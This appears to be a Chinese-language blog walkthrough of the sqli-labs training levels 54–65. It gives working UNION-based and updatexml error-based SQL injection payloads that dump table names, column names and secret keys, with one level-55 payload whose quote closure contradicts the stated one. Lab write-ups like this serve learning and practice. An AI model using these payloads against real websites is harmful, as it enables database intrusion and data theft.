sql-54
翻译一下页面,得知我们只有十次机会。id参数是单引号闭合。
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 我得到的表名是igsyiz2p7z。(每个人得到的应该都不一样,所以后面的代码要改一下)
?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='igsyiz2p7z'--+
?id=-1' union select 1,group_concat(secret_0GZU),3 from igsyiz2p7z--+ 
这样就得到我们的key值了,提交了即可。
sql-55
这关有14次机会,id是括号闭合。
?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='jsoh4368gx'--+
?id=-1' union select 1,group_concat(secret_D93I),3 from jsoh4368gx--+ 
sql-56
14次机会,')闭合。跟前两关类似,在这里就不写步骤了。
sql-57
双引号闭合,跟上面几关一样。
sql-58
这关少于五次的机会,单引号闭合。使用报错注入即可。
?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+
?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='kecj1r7f3t')),3)--+
?id=1' and updatexml(1,concat(1,(select group_concat(secret_8HG4) from kecj1r7f3t )),3) --+
sql-59
这关是整数型,方法跟上一关一样。
sql-60
闭合类型是"),方法跟前两关一样。
sql-61
闭合类型是')),方法同上。
sql-62
闭合类型是单引号加括号。没有报错信息,联合注入也没有注入点,所以这关只能使用布尔盲注或时间盲注,具体步骤可以看
时间盲注:Blind- Time based-Single Quotes-String--SQL注入-CSDN博客
布尔盲注:Blind-Boolian-Single Quotes-String--SQL注入-CSDN博客
sql-63
单引号闭合,方法同上。
sql-64
闭合类型是)),方法同上。
sql-65
闭合类型是"),方法同上。
总结
sql全部关卡到这就结束了,总结一下方法有:联合注入,报错注入,堆叠注入,时间盲注,布尔盲注,宽字节注入,外带注入,头部注入,二次注入,外带注入。通过实践练习可以更好地掌握这些注入技术。